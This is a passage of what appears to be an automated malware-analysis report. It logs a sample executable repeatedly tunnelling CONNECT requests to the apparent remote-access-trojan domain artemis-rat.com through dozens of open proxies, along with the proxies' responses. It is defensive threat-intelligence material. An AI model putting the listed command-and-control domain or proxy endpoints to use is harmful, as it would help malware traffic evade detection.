                                                                                                                                                                                                                                                            1337192.168.2.55362850.63.12.33614643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.495817900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1338192.168.2.553578154.205.152.9690803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.507563114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.716461897 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1339192.168.2.55357338.162.10.16431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.507651091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.934410095 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1340192.168.2.553543103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.512361050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1341192.168.2.551991213.136.79.177329303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.517775059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592648983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.701955080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1342192.168.2.55206491.134.140.16025723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.520736933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092535973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.702043056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889789104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1343192.168.2.551987213.202.230.241803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.527832985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514467001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.514738083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.608267069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1344 | 192.168.2.5 | 53590 | 135.148.10.161 | 31696 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.531172037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.179681063 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.996923923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405591965 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217849016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.014802933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.905126095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.514575958 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1345 | 192.168.2.5 | 52087 | 79.110.196.145 | 8081 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.536935091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1346 | 192.168.2.5 | 53545 | 125.122.26.242 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.547410011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1347 | 192.168.2.5 | 52078 | 103.169.149.254 | 1111 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.552999020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.362740040 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1348 | 192.168.2.5 | 53637 | 104.18.220.95 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.566050053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.721604109 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1349 | 192.168.2.5 | 53568 | 195.154.172.161 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.571873903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:32:43.185669899 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:43.998756886 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:44.894727945 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:46.687155008 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:50.272243023 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:57.438718081 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:11.774764061 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1350 | 192.168.2.5 | 51938 | 171.244.140.160 | 34559 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.583686113 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.592690945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1351 | 192.168.2.5 | 53583 | 134.209.189.42 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.586477995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.880511999 CET | 327 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1352192.168.2.5535725.9.98.14234383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.588726044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1353192.168.2.55357094.23.84.2581183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.589096069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.742468119 CET161INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Proxy-Agent: Privoxy 3.0.21
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1354192.168.2.551932105.112.140.21880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646192074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701957941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.935082912 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1355192.168.2.553080103.174.102.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646298885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.694468975 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
Mar 11, 2024 03:30:47.694647074 CET270IN
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 44


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1356192.168.2.55355227.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646677971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1357192.168.2.55240072.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646747112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1358192.168.2.552093114.79.148.218803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646804094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702035904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702207088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.717706919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1359192.168.2.55209127.147.131.12280903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.652465105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702054024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014017105 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1360192.168.2.553615103.151.20.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.652965069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445910931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505959988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572614908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701963902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
